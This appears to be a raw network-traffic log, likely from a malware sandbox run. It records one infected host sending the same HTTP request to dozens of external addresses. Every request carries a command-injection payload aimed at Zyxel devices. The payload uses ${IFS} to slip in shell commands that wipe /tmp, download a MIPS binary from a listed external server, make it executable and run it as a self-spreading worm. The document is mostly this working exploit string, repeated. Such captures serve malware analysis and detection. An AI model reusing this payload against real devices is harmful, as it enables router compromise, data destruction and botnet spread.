                              Mar 31, 2024 08:41:01.421854973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              68192.168.2.1337922149.215.191.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.421941996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              69192.168.2.1334866211.138.255.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.422044992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              70192.168.2.1357102126.101.220.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.422127962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              71192.168.2.1341250146.102.225.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.422233105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              72192.168.2.1342248138.11.158.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.422346115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              73192.168.2.13426222.96.232.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.422440052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              74192.168.2.1347316178.181.108.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.422501087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              75192.168.2.1348028122.5.226.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.422597885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              76192.168.2.1360794146.103.1.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.422657967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              77192.168.2.1354708223.247.28.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.422707081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              78192.168.2.1335798191.212.90.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.422825098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              79192.168.2.1360850172.100.186.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.422926903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              80192.168.2.134197898.192.55.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.422976017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              81192.168.2.134311214.172.155.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.423068047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              82192.168.2.133494223.175.165.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.423171997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              83192.168.2.1360884220.91.194.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.423254013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              84192.168.2.136063489.254.94.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.423310995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              85192.168.2.1349224157.123.175.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.423403978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              86192.168.2.133612684.11.155.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.423460960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              87192.168.2.134100690.179.41.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.423552036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              88192.168.2.1347610166.18.202.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.423629045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              89192.168.2.1358434118.178.218.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.423690081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              90192.168.2.1359194121.255.244.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.423794031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              91192.168.2.1335034113.0.25.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.423857927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              92192.168.2.13600969.195.110.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.423971891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              93192.168.2.133870696.22.60.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.424011946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              94192.168.2.1337894100.227.65.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.424065113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              95192.168.2.133886073.137.206.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.424187899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              96192.168.2.133404867.48.2.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.424252033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              97192.168.2.1353332139.43.77.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.424278021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              98192.168.2.1356652223.153.249.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.424400091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              99192.168.2.135441050.63.209.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.424499035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              100192.168.2.134465877.60.163.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.424552917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              101192.168.2.135106672.41.180.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.424645901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              102192.168.2.1346818139.90.195.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.424688101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              103192.168.2.134206266.211.159.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.424781084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              104192.168.2.134743836.128.170.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.424854994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              105192.168.2.133966653.251.253.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.424953938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              106192.168.2.135300673.97.191.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.425024986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              107192.168.2.134493871.68.101.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.425128937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              108192.168.2.134327878.202.182.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.425209045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              109192.168.2.1345986128.131.189.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.425272942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              110192.168.2.134525489.50.99.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.425334930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              111192.168.2.135901448.206.119.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.425400019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              112192.168.2.134301866.134.10.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.425465107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              113192.168.2.1354694139.176.233.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.425510883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              114192.168.2.1354742108.162.91.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.425617933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              115192.168.2.1360558138.159.240.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.425668001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              116192.168.2.133988671.19.70.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.425743103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              117192.168.2.1357184107.80.175.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.425796032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              118192.168.2.134822474.206.12.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.425863028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              119192.168.2.1355180176.166.26.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.425967932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              120192.168.2.1333336164.17.45.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.426011086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              121192.168.2.1344038186.110.149.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.426131010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              122192.168.2.1341516103.247.192.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.426218033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              123192.168.2.1332974150.47.130.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.426273108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              124192.168.2.1338370139.97.180.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.426367044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              125192.168.2.1345956122.39.178.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.426476002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              126192.168.2.134204853.166.91.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.426562071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              127192.168.2.1358798144.203.228.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.426594019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              128192.168.2.1350424115.91.239.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.426681042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              129192.168.2.1333512155.138.189.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.426800013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              130192.168.2.1350690160.179.213.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.426853895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              131192.168.2.135224825.241.42.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.426955938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              132192.168.2.1343968217.94.243.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.427051067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              133192.168.2.1342886140.107.251.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.427093029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              134192.168.2.133475657.1.59.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.427124023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              135192.168.2.134410262.253.15.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.427258015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              136192.168.2.1358014154.101.177.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.427325010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
